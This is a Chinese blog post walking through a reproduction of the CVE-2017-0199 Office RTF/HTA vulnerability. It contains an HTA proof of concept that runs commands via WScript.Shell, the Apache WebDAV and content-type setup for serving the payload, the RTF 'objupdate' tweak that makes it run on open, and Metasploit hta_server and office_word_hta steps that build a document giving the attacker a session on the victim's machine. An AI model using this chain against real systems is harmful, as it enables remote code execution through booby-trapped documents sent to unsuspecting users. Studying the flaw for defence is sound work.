CVE-2017-0199漏洞复现过程

栏目: 服务器 · Apache · 发布时间: 8年前

内容简介:CVE-2017-0199漏洞复现过程

一台apache服务器(这里我用Kali)、POC和一个Word文档。

POC内容大概如下:

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>

Word文档内容任意。

CVE-2017-0199漏洞复现过程

然后将其放在Kali服务器上

Apache需要开启DAV支持,具体命令如下

a2enmod dav  
a2enmod dav_fs  
a2enmod dav_lock  
a2enmod headers

CVE-2017-0199漏洞复现过程

测试过程

在web目录新建ms文件夹,将test.docx复制到ms目录下,并重命名为test.rtf

root@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf

新建Word文档,插入对象

如图

CVE-2017-0199漏洞复现过程

并保存为rtf文件,如233.rtf

删除服务器上的test.rtf文件

并将poc.hta文件复制到ms目录下,并改名为test.rtf

root@kali:/var/www/html/ms# rm -rf test.rtf
root@kali:~/Documents# cp poc.hta /var/www/html/ms/test.rtf

修改Apache配置

<Directory />  
Dav on  
</Directory>  

 <Directory /var/www/html/ms/>  
Header set Content-Type "application/hta"  
</Directory>

CVE-2017-0199漏洞复现过程

并重启服务器 service apache2 restart

打开233.rtf文档

双击word文档的文字,将会有惊喜弹出

CVE-2017-0199漏洞复现过程

打开文档就弹出的话需要将 \object\objautlink\rsltpict 修改为

\object\objautlink\objupdate\rsltpict
CVE-2017-0199漏洞复现过程

再次打开文件

CVE-2017-0199漏洞复现过程

彩蛋(MSF下的实现)

在kali下执行。

首先更新msf到最新。(假设你们都完成了这个过程)

下载利用脚本

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/fileformat# wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb

然后msf下执行命令 reload_all 重新加载模块

CVE-2017-0199漏洞复现过程

下载rtf文件到 /usr/share/metasploit-framework/data/exploits 目录

cd /usr/share/metasploit-framework/data/exploits

wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/data/exploits/cve-2017-0199.rtf

开启hta服务

msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options
msf exploit(hta_server) > run

CVE-2017-0199漏洞复现过程

生成exploit文档

msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options
msf exploit(office_word_hta) > set TARGETURI http://192.168.232.134:8080/4Jmy4cmcZZV7pwi.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
msf exploit(office_word_hta) > run

CVE-2017-0199漏洞复现过程

将生成的msf.doc文件复制到windows上,打开即可获取一个会话

如下所示


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Domain-Driven Design

Domain-Driven Design

Eric Evans / Addison-Wesley Professional / 2003-8-30 / USD 74.99

"Eric Evans has written a fantastic book on how you can make the design of your software match your mental model of the problem domain you are addressing. "His book is very compatible with XP. It is n......一起来看看 《Domain-Driven Design》 这本书的介绍吧!

随机密码生成器
随机密码生成器

多种字符组合密码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具